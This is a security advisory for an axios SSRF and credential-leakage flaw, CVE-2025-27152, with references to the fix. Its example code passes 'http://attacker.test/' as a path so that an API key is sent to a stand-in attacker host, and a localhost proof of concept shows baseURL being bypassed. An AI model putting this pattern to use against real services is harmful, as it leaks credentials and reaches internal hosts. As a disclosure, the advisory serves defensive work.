GHSA-jr5f-v2jv-69x6
Suggest an improvement- Source
- https://github.com/advisories/GHSA-jr5f-v2jv-69x6
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-jr5f-v2jv-69x6/GHSA-jr5f-v2jv-69x6.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-jr5f-v2jv-69x6
- Aliases
- Related
- Published
- 2025-03-07T15:16:00Z
- Modified
- 2025-03-28T14:57:51Z
- Severity
-
- 7.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P CVSS Calculator
- Summary
- axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
- Details
-
Summary
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if
baseURLis set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.Details
Consider the following code snippet:
import axios from "axios"; const internalAPIClient = axios.create({ baseURL: "http://example.test/api/v1/users/", headers: { "X-API-KEY": "1234567890", }, }); // const userId = "123"; const userId = "http://attacker.test/"; await internalAPIClient.get(userId); // SSRFIn this example, the request is sent to
http://attacker.test/instead of thebaseURL. As a result, the domain owner ofattacker.testwould receive theX-API-KEYincluded in the request headers.It is recommended that:
- When
baseURLis set, passing an absolute URL such ashttp://attacker.test/toget()should not ignorebaseURL. - Before sending the HTTP request (after combining the
baseURLwith the user-provided parameter), axios should verify that the resulting URL still begins with the expectedbaseURL.
PoC
Follow the steps below to reproduce the issue:
Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2 echo "this is server1" > /tmp/server1/index.html echo "this is server2" > /tmp/server2/index.html python -m http.server -d /tmp/server1 10001 & python -m http.server -d /tmp/server2 10002 &Create a script (e.g., main.js):
import axios from "axios"; const client = axios.create({ baseURL: "http://localhost:10001/" }); const response = await client.get("http://localhost:10002/"); console.log(response.data);Run the script:
$ node main.js this is server2
Even though
baseURLis set tohttp://localhost:10001/, axios sends the request tohttp://localhost:10002/.Impact
- Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
- SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
- Affected Users: Software that uses
baseURLand does not validate path parameters is affected by this issue.
- When
- Database specific
{ "nvd_published_at": "2025-03-07T16:15:38Z", "cwe_ids": [ "CWE-918" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-03-07T15:16:00Z" }- References
-
- https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6
- https://nvd.nist.gov/vuln/detail/CVE-2025-27152
- https://github.com/axios/axios/issues/6463
- https://github.com/axios/axios/pull/6829
- https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde
- https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f
- https://github.com/axios/axios
- https://github.com/axios/axios/releases/tag/v1.8.2
Affected packages
npm / axios
Package
- Name
- axios
- View open source insights on deps.dev
- Purl
- pkg:npm/axios
npm / axios
Package
- Name
- axios
- View open source insights on deps.dev
- Purl
- pkg:npm/axios